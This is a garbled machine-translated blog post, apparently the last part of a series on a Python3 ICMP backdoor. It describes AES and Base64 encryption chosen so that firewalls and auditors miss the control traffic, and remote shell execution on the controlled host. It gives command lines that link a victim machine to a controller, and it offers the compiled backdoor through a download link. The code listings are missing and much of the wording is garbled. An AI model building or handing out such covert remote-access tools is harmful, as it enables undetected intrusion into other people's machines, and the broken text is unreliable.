Python3 implementing the "Boss" appearance of the ICMP remote backdoor (bottom)

ICMP backdoor

Objective

First: Python3 implementation of the ICMP remote Control back door (upper)

The second article: Python3 implementation of the ICMP remote control back door (top) _ supplementary article

Article Three: Python3 realization of the ICMP remote control back door (Central) "sniff" black technology

Last article, the boss of this series to appear, implemented an interesting ICMP backdoor, temporarily using Pyinstaller packaged into a Win32 and 64 version, as shown in.

On the basis of the previous few, this article expands the knowledge points for the encryption and decryption of data, as well as the call of the shell, and eventually generates an available ICMP backdoor. This article is divided into five sections, which takes 5 minutes.

The first section of communication encryption and decryption

ICMP remote control uses the ICMP protocol to communicate, in order to ensure the confidentiality of communications, prevent firewalls or auditors to detect control information, determine the content of the ICMP data domain encryption processing.

This is the use of AES encryption and Base64 encoding combination method. AES is the most common symmetric encryption algorithm (the encryption algorithm is used for small program encrypted transmission). Symmetric encryption algorithms are encryption and decryption with the same key , the specific encryption and decryption process such as:

AES is just a basic algorithm that implements AES in several modes. The CBC mode is a technical standard because of its security, which is TLS (the encryption standard for HTTPS) and IPSec (Win-adopted). To put it simply, CBC uses a password and salt (disruptive) to generate key and IV as a fixed algorithm (MD5). Then encrypt (plaintext) and decrypt (ciphertext) with key and IV (initial vector, encrypt first plaintext).

The following is a description of the ICMP remote encryption and decryption scheme, for AES Plus decryption, here in CBC mode, in Python3.5 and previous versions using the Pycrypto module, after the version using the Pycrytodome module.

Encryption

First using AES encryption, the length of the incoming encrypted content must be a multiple of 16, the shortfall is a multiple of 16, I am here to set the complement to a multiple of 32. After the end of AES encryption, the encrypted content is Base64 encoded for transmission.

Decrypt

First, the encrypted content is Base64 decoded, followed by AES decryption, and finally removed in order to align the contents of the fill.

The second section of the shell call

The basic function of the ICMP backdoor is to complete the shell call, which is often said to bounce the shell. The shell that bounces is the shell of the controlled side, the control side sends the shell command to the managed side through the ICMP protocol, the managed side invokes the shell to execute the command, and passes the command result back to the control via the ICMP protocol. The call to the shell in Python is as follows:

Section III The overall structure of the program

There are a total of three classes in the code, the parent class transfer, and two subclass client and server. The transfer class mainly completes the general function of socket initialization, encryption and decryption, and ICMP protocol packet. It also provides a reverse method that requires a subclass implementation.

Parent class Transfer

Sub-class Client

Sub-Class Server

Section fourth how to use

Taking the Icmpshell_win32.exe I generated for example, to facilitate the demonstration, a VM virtual machine was turned on, and the host computer made up a local area network, the VM was running a Win7 32-bit system, and the host was running a Win7 64 system. The IP of the host is 192.168.72.4, the IP of the virtual machine is 192.168.72.133.

Host as the control side, the virtual machine as the managed end. First run the following command on the host (Administrator privileges Run):

Icmpshell_win32.exe-s 192.168.72.4

Where-s parameter is used to indicate the IP of the control side

Run the following command on the managed side (Administrator privileges Run):

Icmpshell_win32.exe-l 192.168.72.133-c 192.168.72.4

Where the-l parameter is used to indicate the IP,-C parameter of the managed side to indicate the IP of the control side to be connected

Managed End Run effect

Control end Operation Effect

Execute the dir command and the tasklist command

WHOAMI command

I Cmpshell source code has been first uploaded to the knowledge Planet , want to see the source code of Friends please pay attention to my knowledge of the planet.

If everyone just want to play, to provide you with the Icmpshell_win32.exe download link.

https://pan.baidu.com/s/1xQRyxmq6PUw6qHMU9ZKZ4g Password: 8rgu

At last

If you think this article can also, must remember recommended yo. Please pay attention to my public number, knowledge Planet in the menu.

Reply to "1": Collect Python Data Analysis Tutorial Package
Reply to "2": Collect Python Flask full set of tutorials
Reply to "3": Collect machine learning complete tutorial

Python3 implementing the "Boss" appearance of the ICMP remote backdoor (bottom)